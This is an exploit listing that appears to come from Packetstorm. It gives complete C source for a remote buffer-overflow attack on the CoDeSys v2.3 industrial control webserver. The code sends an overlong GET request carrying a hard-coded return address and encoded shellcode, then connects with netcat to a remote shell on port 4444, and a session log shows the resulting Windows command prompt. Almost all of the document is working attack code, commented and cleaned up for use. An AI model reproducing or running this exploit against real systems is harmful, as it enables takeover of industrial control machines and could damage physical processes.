
CoDeSys 2.3 Buffer Overflow

🗓️ 01 Dec 2011 00:00:00 · Reported by Celil Unuver · Type: packetstorm
🔗 Source: packetstormsecurity.com

CoDeSys 2.3 Buffer Overflow in Industrial Control System Development Software

Code
`/*  
CoDeSys v2.3 Industrial Control System Development Software  
Remote Buffer Overflow Exploit for CoDeSys Scada webserver  
Author : Celil UNUVER, SignalSEC Labs  
www.signalsec.com  
Tested on WinXP SP1 EN  
THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!  
--snip--  
  
root@bt:~# ./codesys 192.168.1.36  
  
CoDeSys v2.3 webserver Remote Exploit  
by SignalSEC Labs - www.signalsec.com  
  
[+]Sending payload to SCADA system!  
  
[+]Connecting to port 4444 to get shell!  
192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out  
(UNKNOWN) [192.168.1.36] 4444 (?) open  
Microsoft Windows XP [Version 5.1.2600]  
(C) Copyright 1985-2001 Microsoft Corp.  
  
C:\Program Files\3S Software\CoDeSys V2.3\visu>   
  
--snip--  
  
*/  
  
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
  
#define name "CoDeSys v2.3 webserver Remote Exploit"  /* banner printed at start-up (lowercase macro name collides easily with locals) */
#define PORT 8080  /* TCP port of the CoDeSys v2.3 webserver the request is sent to */
#define JUNK "A"   /* filler byte repeated 775 times to reach the saved return address */
  
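/*
 * Spawn "nc -vv <target> 4444" without going through a shell, wait for it
 * and report how it ended.
 *
 * target: address string handed to netcat verbatim as one argv element.
 * Returns netcat's exit status (0 = exited normally with status 0),
 * 127 if it could not be executed, or -1 if fork()/waitpid() failed or
 * netcat was killed by a signal.
 */
static int run_netcat(const char *target)
{
    pid_t child;
    int status = 0;

    /* Anything still buffered on stdout must go out before the child
     * inherits the descriptor, otherwise it is lost or reordered. */
    fflush(stdout);

    child = fork();
    if (child == -1) {
        perror("fork");
        return -1;
    }
    if (child == 0) {
        /* Explicit argv: the target is one argument, never shell-parsed. */
        execlp("nc", "nc", "-vv", target, "4444", (char *)NULL);
        perror("nc");
        _exit(127);
    }
    if (waitpid(child, &status, 0) == -1) {
        perror("waitpid");
        return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/*
 * Entry point.  Builds the oversized GET request (filler, saved return
 * address, payload), delivers it to the CoDeSys webserver on TCP PORT and
 * then hands the terminal to netcat on TCP 4444, where the payload is
 * expected to be listening (see the session log in the file header).
 *
 * argv[1]: target address in dotted-quad form; it is parsed with
 *          inet_aton(), no name resolution is done.
 * Exit status is kept as in the original tool: 255 (exit(-1)) on usage
 * error, 1 socket(), 2 bad address, 3 connect(), 4 send(), 0 otherwise
 * (also when netcat reports failure - only the message differs).
 *
 * Changes from the original:
 *   - the request is assembled with explicit lengths and the buffer size
 *     is checked, instead of a chain of unbounded strcat() calls;
 *   - send() is looped until every byte is written, since one call on a
 *     stream socket may accept fewer bytes than asked;
 *   - netcat is started with fork()/execlp() and an explicit argv.  The
 *     original exported argv[1] into the environment and let a shell
 *     expand it inside system("nc -vv ${target} 4444 || ..."); the only
 *     validation was inet_aton(), whose BSD-derived parser (glibc at
 *     least) accepts trailing text after whitespace, so an argument such
 *     as "1.2.3.4 ;cmd" would have reached the shell.  Minor for a local
 *     tool, still a pattern worth removing;
 *   - the bad-address path no longer calls perror(): inet_aton() does not
 *     set errno, so the original printed a stale error text.
 * The bytes put on the wire are unchanged.
 */
int main ( int argc, char *argv[] )
{
    /* Request skeleton.  The request line is sent exactly as the original
     * tool did: "HTTP/1.1" with no Host header and no terminating blank
     * line - the target was shown to accept it. */
    static const char prefix[] = "GET /";
    static const char suffix[] = " HTTP/1.1\r\n";
    enum { JUNK_LEN = 775 };    /* filler bytes before the return address */

    /* Hard-coded return address; valid for WinXP SP1 EN (mswsock.dll) only
     * and must be changed for any other build, as the failure message says. */
    char ret[] = "\x67\x42\xa7\x71";

    /* Payload appended after the return address.  Taken over unchanged;
     * per the header log a shell listens on TCP 4444 once it has run. */
    char hellcode[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
    "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
    "\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37"
    "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58"
    "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
    "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58"
    "\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
    "\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38"
    "\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d"
    "\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48"
    "\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56"
    "\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"
    "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57"
    "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
    "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
    "\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50"
    "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
    "\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34"
    "\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31"
    "\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
    "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"
    "\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"
    "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
    "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d"
    "\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
    "\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55"
    "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36"
    "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c"
    "\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c"
    "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52"
    "\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
    "\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
    "\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56"
    "\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
    "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
    "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"
    "\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
    "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"
    "\x4f\x4f\x42\x4d\x5a";

    char request[1600];
    char *cursor = request;
    size_t ret_len, code_len, total, sent;
    struct sockaddr_in dest_addr;
    int sock;

    printf("\n%s\n by SignalSEC Labs - www.signalsec.com\n", name);

    if (argc < 2) {
        printf("\nUsage: codesys [IP]\n");
        exit(-1);
    }

    /* strlen() rather than sizeof: matches the strcat() semantics of the
     * original, i.e. copying stops at the first NUL byte should one ever
     * be introduced into ret[] or hellcode[]. */
    ret_len = strlen(ret);
    code_len = strlen(hellcode);
    total = (sizeof prefix - 1) + JUNK_LEN + ret_len + code_len + (sizeof suffix - 1);
    if (total >= sizeof request) {
        fprintf(stderr, "\nrequest buffer too small: need %zu bytes, have %zu\n",
                total + 1, sizeof request);
        exit(1);
    }

    /* Layout: "GET /" + 775 filler bytes + return address + payload +
     * request-line tail.  Every copy is bounded by the check above. */
    memcpy(cursor, prefix, sizeof prefix - 1);
    cursor += sizeof prefix - 1;
    memset(cursor, JUNK[0], JUNK_LEN);
    cursor += JUNK_LEN;
    memcpy(cursor, ret, ret_len);
    cursor += ret_len;
    memcpy(cursor, hellcode, code_len);
    cursor += code_len;
    memcpy(cursor, suffix, sizeof suffix - 1);
    cursor += sizeof suffix - 1;
    *cursor = '\0';

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("\nsocket error\n");
        exit(1);
    }

    memset(&dest_addr, 0, sizeof dest_addr);
    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(PORT);
    if (!inet_aton(argv[1], &dest_addr.sin_addr)) {
        fprintf(stderr, "\ninet_aton problems: '%s' is not a dotted-quad address\n", argv[1]);
        close(sock);
        exit(2);
    }

    if (connect(sock, (struct sockaddr *)&dest_addr, sizeof dest_addr) == -1) {
        perror("\nCouldnt connect to target!\n");
        close(sock);
        exit(3);
    }

    /* Loop: a single send() may accept fewer than total bytes. */
    for (sent = 0; sent < total; ) {
        ssize_t n = send(sock, request + sent, total - sent, 0);
        if (n == -1) {
            perror("\nCan not send the payload\n");
            close(sock);
            exit(4);
        }
        sent += (size_t)n;
    }
    close(sock);

    printf("\n[+]Sending payload to SCADA system!\n");
    sleep(1);
    printf("\n[+]Connecting to port 4444 to get shell!\n");
    sleep(2);

    /* Same fallback text the original printed via "|| echo '...'". */
    if (run_netcat(argv[1]) != 0) {
        puts("Sorry exploit failed! Change RET address or be sure target is not patched!");
    }
    exit(0);
}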
  
`
